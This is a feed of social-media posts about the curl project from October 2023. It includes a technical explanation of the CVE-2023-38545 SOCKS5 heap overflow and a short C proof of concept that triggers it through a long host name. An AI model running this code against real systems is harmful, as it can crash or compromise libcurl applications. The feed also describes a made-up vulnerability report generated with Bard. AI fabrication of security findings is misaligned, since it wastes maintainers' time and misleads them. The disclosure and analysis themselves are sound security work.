in the #curl project, we have already done more commits in 2023 than any single previous year since 2014. If we manage 152 more commits this year, 2023 will become the most-commits year since 2004, which remains our top year with 2102 commits in a single year.

Things you figure out when you have graphs.

Brodie speaks up about the AI generated security report crap the #curl project received recently, and I think he does it nicely.

youtu.be/r0-tKuoiagY?si=QjxaFt…

CURL Project Trolled By Fake AI Bug Report

When you're a project as big as curl sometimes you get some weird bug report and recently Daniel Stenberg got a completely AI generated made up report, pleas...

^YouTube

On this day, six years ago, I was awarded the Polhem Prize for my work on #curl - and went home with a gold medal that was handed to me by the King of Sweden. A night to remember.

daniel.haxx.se/blog/2017/10/20…

TBH that kinda matches the description.

After all, your work on #wolfSSL and #curl is something noone outside of the know even is aware of but millions pf people if not billions of devices rely on daily...

Really like that XKCD dependency stack...

Later this afternoon in #Stockholm I will blab #curl (again):

nordicapis.com/sessions/next-l…

We disclosed this #hackerone report against #curl when someone asked Bard to find a vulnerability, and it hallucinated together something:

hackerone.com/reports/2199174

curl disclosed on HackerOne: [Critical] Curl CVE-2023-38545...

## Summary: Curl CVE-2023-38545 vulnerability code changes are disclosed on the internet ## Steps To Reproduce: To replicate the issue, I have searched in the Bard about this vulnerability. It...

^HackerOne

Latest BASH (version 5.2) and CURL (version 8.4.0) is available for IBM i. 😍
Thank you, IBM!

As always update using yum or ACS.

BASH 5.2 release note: lists.gnu.org/archive/html/bas…
CURL 8.4.0 changelog: curl.se/changes.html#8_4_0

#IBMi #IBMiOSS #bash #curl

Good question.

The only person I know that is even remotely into that stuff may be @ncommander.

After all, #backporting #curl to legacy #FreeBSD sounds like the kind of #SoftwareGore and #DigitalMasochism he's likes to showcase on his #YouTube channel...

Anyone happen to know anything about #FreeBSD (legacy) header files and wants to help us out with a #curl build issue?

github.com/curl/curl/pull/1210…

curl.h: only include "osreldate.h" on pre v8 FreeBSD by bagder · Pull Request #12109 · curl/curl

Follow-up to b89789d. This header does not exist in all modern versions. Fixes #12107 Reported-by: Faraz Fallahi

^GitHub

This week many engineering teams are looking for the immensely popular open source library 'curl' in order to get ahead of the CVE-2023-38545 vulnerability. Most of them are NOT going to see it in their SBOM even though they use it.

In this article I walk through why this is, places it might be hiding and questions to ask that can help uncover your use of it.

zebracatzebra.com/oss/curl-is-… #curl #sca #sbom

I watched “Mastering the curl command line with @bagder”

It took me more than a week and it was totally worth it!

youtube.com/watch?v=V5vZWHP-Rq…

#curl

Mastering the curl command line with Daniel Stenberg

The slides = https://www.slideshare.net/DanielStenberg7/mastering-the-curl-command-linepdf0:00 Mastering the curl command line0:16 Daniel Stenberg0:36 curl s...

^YouTube

3,000 contributors

daniel.haxx.se/blog/2023/10/13…

#curl

Next week on "Platform Summit 2023" in Stockholm I am going to talk "next level curl" nordicapis.com/sessions/next-l…

30 minutes of fun #curl things brought in the last few years

Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec

How I made a heap overflow in #curl

Let me talk CVE-2023-38545 a bit

daniel.haxx.se/blog/2023/10/11…

#curl 8.4.0 is here.

daniel.haxx.se/blog/2023/10/11…

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.

#infosec

"Most usage of #curl is as a command-line utility"

I would not have put it that way...

theregister.com/2023/10/10/cur…

Fresh curl tomorrow will patch 'worst' security flaw in ages

It’s bad, folks. Pair of CVEs incoming on October 11

^{Richard Speed (The Register)}